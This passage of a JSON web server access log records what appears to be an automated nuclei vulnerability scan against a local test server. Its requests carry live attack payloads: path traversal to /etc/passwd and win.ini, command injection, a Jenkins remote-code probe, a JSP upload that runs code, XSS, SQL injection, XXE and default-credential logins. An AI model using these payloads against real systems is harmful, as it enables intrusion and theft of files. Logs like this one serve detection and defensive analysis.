/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2021/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.029","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/empty/search/results?limit=10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weblogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /FileZilla.xml HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/device-id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/297MbGS9n6TB0ah7g3CpIz88kCS.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/uploadify/fileList?type=.+&path=../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /control/stream?contentId=%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/tmui/login/welcome.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/pkg?command= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/tm/sys/management-ip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"cat_id=4'&get_seleted_Category=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /homeaction.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.235","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mainfunction.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MbCpwXup2yjFwGRgaIwhDtzJ.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"\x221\x22:1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"{\x22name\x22:\x22admin\x22,\x22password\x22:\x22admin\x22,\x22checkbox\x22:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/system HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"payload=<%3fxml+version%3d\x221.0\x22+%3f>%25xxe%3b]>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 